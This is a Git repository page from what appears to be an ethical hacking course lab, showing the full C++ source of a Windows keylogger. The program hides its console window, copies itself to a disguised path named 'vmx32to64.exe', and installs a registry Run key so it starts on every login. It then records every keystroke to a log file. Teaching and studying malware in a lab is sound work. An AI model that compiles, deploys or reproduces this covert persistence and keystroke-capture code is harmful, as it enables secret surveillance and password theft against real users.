digital-forensics-labs/Ubalt
1
0
Fork 0
mirror of https://github.com/frankwxu/Ubalt.git synced 2026-02-20 13:40:42 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
1ae1cf04a51d18b88da2860038f75964bb55f3e8
Ubalt/EthicalHacking/Labs/Keylogger/VS/keylogger_sam.cpp
Frank Xu 1ae1cf04a5 add FSCS630 lab
2020-01-28 09:17:22 -05:00

132 lines
2.3 KiB
C++
Raw Blame History

#define _WIN32_WINNT 0x0500
#include <Windows.h>
#include <string>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
#pragma comment(lib, "User32.lib")
#pragma comment(lib, "Advapi32.lib")
/* Based on https://github.com/EgeBalci/Keylogger */
using namespace std;
char logfile[] = "log.txt";
char oldfile[] = "keylogger_sam.exe";
char newfile[] = "C:\\Logs\\vmx32to64.exe";
void LOG(string input) {
fstream LogFile;
LogFile.open(logfile, fstream::app);
if (LogFile.is_open()) {
LogFile << input;
LogFile.close();
}
}
bool SpecialKeys(int S_Key) {
switch (S_Key) {
case VK_SPACE:
cout << " ";
LOG(" ");
return true;
case VK_RETURN:
cout << "\n";
LOG("\n");
return true;
case VK_OEM_PERIOD:
cout << ".";
LOG(".");
return true;
case VK_SHIFT:
cout << "#SHIFT#";
LOG("#SHIFT#");
return true;
case VK_BACK:
cout << "\b";
LOG("\b");
return true;
case VK_RBUTTON:
cout << "#R_CLICK#";
LOG("#R_CLICK#");
return true;
case VK_CAPITAL:
cout << "#CAPS_LOCK#";
LOG("#CAPS_LOCK");
return true;
case VK_TAB:
cout << "#TAB";
LOG("#TAB");
return true;
case VK_UP:
cout << "#UP";
LOG("#UP_ARROW_KEY");
return true;
case VK_DOWN:
cout << "#DOWN";
LOG("#DOWN_ARROW_KEY");
return true;
case VK_LEFT:
cout << "#LEFT";
LOG("#LEFT_ARROW_KEY");
return true;
case VK_RIGHT:
cout << "#RIGHT";
LOG("#RIGHT_ARROW_KEY");
return true;
case VK_CONTROL:
cout << "#CONTROL";
LOG("#CONTROL");
return true;
case VK_MENU:
cout << "#ALT";
LOG("#ALT");
return true;
default:
return false;
}
}
int main()
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
char KEY = 'x';
/* COPY PROGRAM TO MISLEADING LOCATION */
CopyFile(oldfile, newfile, FALSE);
/* CREATE RUN KEY IN REGISTRY */
TCHAR runPath[35] = TEXT("C:\\Logs\\vmx32to64.exe");
HKEY newValue;
RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&newValue);
RegSetValueEx(newValue,"vmx32to64",0,REG_SZ,(LPBYTE)runPath,sizeof(runPath));
RegCloseKey(newValue);
while (true) {
Sleep(10);
for (int KEY = 8; KEY <= 190; KEY++)
{
if (GetAsyncKeyState(KEY) == -32767) {
if (SpecialKeys(KEY) == false) {
fstream LogFile;
LogFile.open(logfile, fstream::app);
if (LogFile.is_open()) {
LogFile << char(KEY);
LogFile.close();
}
}
}
}
}
return 0;
}
Reference in New Issue View Git Blame Copy Permalink